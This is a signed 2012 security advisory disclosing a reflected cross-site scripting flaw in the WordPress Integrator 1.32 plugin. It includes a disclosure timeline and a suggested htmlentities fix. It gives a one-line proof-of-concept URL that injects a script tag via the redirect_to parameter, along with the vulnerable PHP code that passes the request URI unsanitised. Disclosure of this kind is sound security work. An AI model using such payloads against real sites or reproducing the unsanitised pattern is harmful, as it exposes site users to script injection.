WordPress Integrator plugin version 1.32 suffers from a cross site scripting vulnerability.
226dc0865f1e4637a651cc57b54000997a519d9ef7a21654f2c356f06f380d22
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Advisory: WordPress plugin 'WordPress Integrator 1.32' XSS vulnerability
Advisory ID: SSCHADV2012-010
Author: Stefan Schurtz
Affected Software: Successfully tested on WordPress Integrator 1.32
Vendor URL: http://wordpress.org/extend/plugins/wp-integrator/
Vendor Status: informed
==========================
Vulnerability Description
==========================
The WordPress plugin 'WordPress Integrator' is prone to a XSS vulnerability
==================
PoC-Exploit
==================
http://target/wordpress/wp-login.php?redirect_to=http://%3F1<ScrIpT>alert(666)</ScrIpT>
// vulnerable code in wp-integrator.php
function init_handler() {
$url = parse_url($_SERVER["REQUEST_URI"]);
=========
Solution
=========
function init_handler() {
$url = parse_url(htmlentities($_SERVER["REQUEST_URI"]));
====================
Disclosure Timeline
====================
19-Mar-2012 - vendor informed
20-Mar-2012 - vendor informed (plugins@wordpress.org)
========
Credits
========
Vulnerability found and advisory written by Stefan Schurtz.
===========
References
===========
http://www.darksecurity.de/advisories/2012/SSCHADV2012-010.txt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (MingW32)
Comment: Thunderbird-Portable 3.1.20 by GnuPT - Gnu Privacy Tools
Comment: Download at: http://thunderbird.gnupt.de
iEYEARECAAYFAk9xt3oACgkQg3svV2LcbMCoFQCdEqaArwVj3iuuCAqtljPkVGXS
1xgAn0ItuQyF6kMKxf0DQi1ppNWrHG9E
=0eCo
-----END PGP SIGNATURE-----